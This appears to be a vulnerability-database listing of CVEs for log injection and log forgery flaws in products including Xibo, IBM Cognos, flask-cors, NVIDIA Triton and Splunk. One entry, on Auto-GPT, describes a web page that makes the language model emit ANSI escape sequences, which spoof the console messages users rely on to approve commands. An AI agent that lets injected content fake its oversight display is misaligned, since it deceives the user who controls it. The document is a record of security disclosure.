Total
67 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2024-31845 | 2024-11-21 | N/A | 5.3 MEDIUM | ||
| An issue was discovered in Italtel Embrace 1.6.4. The product does not neutralize or incorrectly neutralizes output that is written to logs. The web application writes logs using a GET query string parameter. This parameter can be modified by an attacker, so that every action he performs is attributed to a different user. This can be exploited without authentication. | |||||
| CVE-2024-29022 | 2024-11-21 | N/A | 8.8 HIGH | ||
| Xibo is an Open Source Digital Signage platform with a web content management system and Windows display player software. In affected versions some request headers are not correctly sanitised when stored in the session and display tables. These headers can be used to inject a malicious script into the session page to exfiltrate session IDs and User Agents. These session IDs / User Agents can subsequently be used to hijack active sessions. A malicious script can be injected into the display grid to exfiltrate information related to displays. Users should upgrade to version 3.3.10 or 4.0.9 which fix this issue. Customers who host their CMS with the Xibo Signage service have already received an upgrade or patch to resolve this issue regardless of the CMS version that they are running. Upgrading to a fixed version is necessary to remediate. Patches are available for earlier versions of Xibo CMS that are out of security support: 2.3 patch ebeccd000b51f00b9a25f56a2f252d6812ebf850.diff. 1.8 patch a81044e6ccdd92cc967e34c125bd8162432e51bc.diff. There are no known workarounds for this issue. | |||||
| CVE-2024-25047 | 2024-11-21 | N/A | 8.6 HIGH | ||
| IBM Cognos Analytics 11.2.0 through 11.2.4 and 12.0.0 through 12.0.2 is vulnerable to injection attacks in application logging by not sanitizing user provided data. This could lead to further attacks against the system. IBM X-Force ID: 282956. | |||||
| CVE-2024-23194 | 2024-11-21 | N/A | 3.3 LOW | ||
| Improper output Neutralization for Logs (CWE-117) in the Command Centre API Diagnostics Endpoint could allow an attacker limited ability to modify Command Centre log files. This issue affects: Gallagher Command Centre v9.10 prior to vEL9.10.1268 (MR1). | |||||
| CVE-2024-22229 | 1 Dell | 3 Unity Operating Environment, Unity Xt Operating Environment, Unityvsa Operating Environment | 2024-11-21 | N/A | 3.1 LOW |
| Dell Unity, versions prior to 5.4, contain a vulnerability whereby log messages can be spoofed by an authenticated attacker. An attacker could exploit this vulnerability to forge log entries, create false alarms, and inject malicious content into logs that compromise logs integrity. A malicious attacker could also prevent the product from logging information while malicious actions are performed or implicate an arbitrary user for malicious activities. | |||||
| CVE-2024-1681 | 2024-11-21 | N/A | 5.3 MEDIUM | ||
| corydolphin/flask-cors is vulnerable to log injection when the log level is set to debug. An attacker can inject fake log entries into the log file by sending a specially crafted GET request containing a CRLF sequence in the request path. This vulnerability allows attackers to corrupt log files, potentially covering tracks of other attacks, confusing log post-processing tools, and forging log entries. The issue is due to improper output neutralization for logs. | |||||
| CVE-2024-0987 | 1 Kuerp Project | 1 Kuerp | 2024-11-21 | 5.8 MEDIUM | 6.3 MEDIUM |
| A vulnerability classified as critical has been found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected is an unknown function of the file /runtime/log. The manipulation leads to improper output neutralization for logs. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252252. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2024-0095 | 2024-11-21 | N/A | 9.0 CRITICAL | ||
| NVIDIA Triton Inference Server for Linux and Windows contains a vulnerability where a user can inject forged logs and executable commands by injecting arbitrary data as a new log entry. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering. | |||||
| CVE-2023-7234 | 1 Integrationobjects | 1 Opc Ua Server Toolkit | 2024-11-21 | N/A | 5.3 MEDIUM |
| OPCUAServerToolkit will write a log message once an OPC UA client has successfully connected containing the client's self-defined description field. | |||||
| CVE-2023-6484 | 2024-11-21 | N/A | 5.3 MEDIUM | ||
| A log injection flaw was found in Keycloak. A text string may be injected through the authentication form when using the WebAuthn authentication mode. This issue may have a minor impact to the logs integrity. | |||||
| CVE-2023-6002 | 1 Yugabyte | 1 Yugabytedb | 2024-11-21 | N/A | 6.5 MEDIUM |
| YugabyteDB is vulnerable to cross site scripting (XSS) via log injection. Writing invalidated user input to log files can allow an unprivileged attacker to forge log entries or inject malicious content into the logs. | |||||
| CVE-2023-4065 | 1 Redhat | 4 Enterprise Linux, Jboss A-mq, Jboss Middleware and 1 more | 2024-11-21 | N/A | 5.5 MEDIUM |
| A flaw was found in Red Hat AMQ Broker Operator, where it displayed a password defined in ActiveMQArtemisAddress CR, shown in plain text in the Operator Log. This flaw allows an authenticated local attacker to access information outside of their permissions. | |||||
| CVE-2023-46713 | 1 Fortinet | 1 Fortiweb | 2024-11-21 | N/A | 5.3 MEDIUM |
| An improper output neutralization for logs in Fortinet FortiWeb 6.2.0 - 6.2.8, 6.3.0 - 6.3.23, 7.0.0 - 7.0.9, 7.2.0 - 7.2.5 and 7.4.0 may allow an attacker to forge traffic logs via a crafted URL of the web application. | |||||
| CVE-2023-46322 | 1 Iterm2 | 1 Iterm2 | 2024-11-21 | N/A | 9.8 CRITICAL |
| iTermSessionLauncher.m in iTerm2 before 3.5.0beta12 does not sanitize ssh hostnames in URLs. The hostname's initial character may be non-alphanumeric. The hostname's other characters may be outside the set of alphanumeric characters, dash, and period. | |||||
| CVE-2023-46321 | 1 Iterm2 | 1 Iterm2 | 2024-11-21 | N/A | 9.8 CRITICAL |
| iTermSessionLauncher.m in iTerm2 before 3.5.0beta12 does not sanitize paths in x-man-page URLs. They may have shell metacharacters for a /usr/bin/man command line. | |||||
| CVE-2023-39461 | 2024-11-21 | N/A | 4.4 MEDIUM | ||
| Triangle MicroWorks SCADA Data Gateway Event Log Improper Output Neutralization For Logs Arbitrary File Write Vulnerability. This vulnerability allows remote attackers to write arbitrary files on affected installations of Triangle MicroWorks SCADA Data Gateway. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of event logs. The issue results from improper sanitization of log output. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root. Was ZDI-CAN-20535. | |||||
| CVE-2023-38020 | 1 Ibm | 1 Soar Qradar Plugin App | 2024-11-21 | N/A | 4.3 MEDIUM |
| IBM SOAR QRadar Plugin App 1.0 through 5.0.3 could allow an authenticated user to manipulate output written to log files. IBM X-Force ID: 260576. | |||||
| CVE-2023-37275 | 1 Agpt | 1 Auto-gpt | 2024-11-21 | N/A | 3.1 LOW |
| Auto-GPT is an experimental open-source application showcasing the capabilities of the GPT-4 language model. The Auto-GPT command line UI makes heavy use of color-coded print statements to signify different types of system messages to the user, including messages that are crucial for the user to review and control which commands should be executed. Before v0.4.3, it was possible for a malicious external resource (such as a website browsed by Auto-GPT) to cause misleading messages to be printed to the console by getting the LLM to regurgitate JSON encoded ANSI escape sequences (`\u001b[`). These escape sequences were JSON decoded and printed to the console as part of the model's "thinking process". The issue has been patched in release version 0.4.3. | |||||
| CVE-2023-36924 | 1 Sap | 1 Erp Defense Forces And Public Security | 2024-11-21 | N/A | 4.9 MEDIUM |
| While using a specific function, SAP ERP Defense Forces and Public Security - versions 600, 603, 604, 605, 616, 617, 618, 802, 803, 804, 805, 806, 807, allows an authenticated attacker with admin privileges to write arbitrary data to the syslog file. On successful exploitation, an attacker could modify all the syslog data causing a complete compromise of integrity of the application. | |||||
| CVE-2023-32712 | 1 Splunk | 1 Splunk | 2024-11-21 | N/A | 8.6 HIGH |
| In Splunk Enterprise versions below 9.1.0.2, 9.0.5.1, and 8.2.11.2, an attacker can inject American National Standards Institute (ANSI) escape codes into Splunk log files that, when a vulnerable terminal application reads them, can potentially, at worst, result in possible code execution in the vulnerable application. This attack requires a user to use a terminal application that supports the translation of ANSI escape codes to read the malicious log file locally in the vulnerable terminal, and to perform additional user interaction to exploit. Universal Forwarder versions 9.1.0.1, 9.0.5, 8.2.11, and lower can be vulnerable in situations where they have management services active and accessible over the network. Universal Forwarder versions 9.0.x and 9.1.x bind management services to the local machine and are not vulnerable in this specific configuration. See SVD-2022-0605 for more information. Universal Forwarder versions 9.1 use Unix Domain Sockets (UDS) for communication, which further reduces the potential attack surface. The vulnerability does not directly affect Splunk Enterprise or Universal Forwarder. The indirect impact on Splunk Enterprise and Universal Forwarder can vary significantly depending on the permissions in the vulnerable terminal application and where and how the user reads the malicious log file. For example, users can copy the malicious file from the Splunk Enterprise instance and read it on their local machine. | |||||